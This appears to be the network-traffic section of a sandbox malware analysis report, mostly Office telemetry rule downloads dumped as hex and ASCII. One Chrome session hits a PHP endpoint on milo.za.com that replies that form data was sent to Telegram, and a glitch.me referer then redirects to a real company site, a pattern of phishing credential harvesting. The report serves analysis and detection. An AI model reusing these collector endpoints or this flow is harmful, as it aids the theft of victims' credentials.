                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            17192.168.2.45768013.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:40 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:40 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 408
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB56D3AFB"
                                                                                                                                                                                                            x-ms-request-id: 9f0f5f99-201e-0096-25f1-2cace6000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052940Z-16547b76f7fxdzxghC1DFWmf7n00000006a0000000009e3f
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            18192.168.2.45768413.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                            x-ms-request-id: ee786005-101e-0065-140e-2d4088000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052941Z-16547b76f7fkcrm9hC1DFWxdag00000006bg000000004y6y
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            19192.168.2.45768613.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 632
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                            x-ms-request-id: cd73d365-901e-00a0-1b58-2e6a6d000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052941Z-17df447cdb5qt2nfhC1DFWeaa0000000028000000000ast8
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            20192.168.2.45768313.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 415
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                            x-ms-request-id: 48bb68ea-401e-0016-35ff-2c53e0000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052941Z-16547b76f7fq9mcrhC1DFWq15w000000063000000000k34f
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            21192.168.2.45768513.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 471
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                            x-ms-request-id: c8bf6ef5-601e-00ab-06f0-2e66f4000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052941Z-17df447cdb56j5xmhC1DFWn91800000002a000000000m2ca
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            22192.168.2.45768713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:41 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 467
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                            x-ms-request-id: a2886317-b01e-00ab-6c01-2ddafd000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052941Z-16547b76f7fknvdnhC1DFWxnys000000067g00000000a4ph
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:41 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            23192.168.2.457688188.114.96.34432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC353OUTGET //pood/phpp4all.php HTTP/1.1
                                                                                                                                                                                                            Host: milo.za.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC876INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Access-Control-Allow-Methods: POST
                                                                                                                                                                                                            Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=autgMeU0yW6pFtmhIFgiL8TN5ffpjsrOeLGtqv9BSpJa13mtbeiatUS%2Fpy9h6TSip6m3XL1c7GjCh%2F%2FFtCCJbzQ74ZBL9XCWnL6jdu38mQ%2BVwfA1MpJ%2F4Hfg0cjklw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2aff6bdd96c0d-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1278&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2825&recv_bytes=931&delivery_rate=2077474&cwnd=251&unsent_bytes=0&cid=fe42f34e70977606&ts=591&x=0"
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC70INData Raw: 34 30 0d 0a 53 75 63 63 65 73 73 66 75 6c 20 73 65 6e 64 69 6e 67 20 65 6d 61 69 6c 46 6f 72 6d 20 64 61 74 61 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                                                                            Data Ascii: 40Successful sending emailForm data sent to Telegram successfully!
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            24192.168.2.457689162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC718OUTGET / HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                            Referer: https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:42 GMT
                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            last-modified: Wed, 06 Nov 2024 05:06:52 GMT
                                                                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                                                                            expires: Wed, 06 Nov 2024 05:29:43 GMT
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            Age: 299
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-dfw-kdfw8210067-DFW
                                                                                                                                                                                                            x-cache: HIT
                                                                                                                                                                                                            x-timer: S1730870982.228216,VS0,VS0,VE3
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2aff6c9e92cb4-DFW
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC777INData Raw: 37 64 34 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 65 6d 70 6c 61 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6c 64 65 72 73 2d 2d 2d 68 6f 6d 65 2d 70 61 67 65 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 21
                                                                                                                                                                                                            Data Ascii: 7d4e<!DOCTYPE HTML><html lang="en"><head> <meta charset="UTF-8"/> <title>Home</title> <meta name="template" content="elders---home-page"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <!
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 2f 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 65 6c 64 65 72 73 2e 63 6f 6d 2e 61 75 2f 65 74 63 2e 63 6c 69 65 6e 74 6c 69 62 73 2f 65 6c 2f 63 6c 69 65 6e 74 6c 69 62 73 2f 63 6c 69 65 6e 74 6c 69 62 2d 73 69 74 65 2f 72 65 73 6f 75 72 63 65 73 2f 69 6d 61 67 65 73 2f 70 6e 67 2f 6c 6f 67 6f 2d 65 6c 64 65 72 73 2e 70 6e 67 22 2f 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 41 70 70 6c 65 20 4e 75 6d 62 65 72 20 43 6c 69 63 6b 20 2d 2d 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61
                                                                                                                                                                                                            Data Ascii: name="twitter:url" content="https://elders.com.au/"/> <meta name="twitter:image" content="https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/png/logo-elders.png"/> ... Apple Number Click --> <meta name="forma
                                                                                                                                                                                                            2024-11-06 05:29:42 UTC1369INData Raw: 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 61 70 69 2e 6a 73 3f 72 65 6e 64 65 72 3d 36 4c 63 56 66 4d 55 6b 41 41 41 41 41 45 7a 74 77 63 42 46 50 70 7a 43 51 51 61 69 4d 44 77 41 47 79 62 6f 55 4b 61 46 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 33 2e 36 2e 30 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61
                                                                                                                                                                                                            Data Ascii: t src="https://www.google.com/recaptcha/api.js?render=6LcVfMUkAAAAAEztwcBFPpzCQQaiMDwAGyboUKaF"></script><script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script><link rel='stylesheet' href='https://cdnjs.cloudflare.com/a
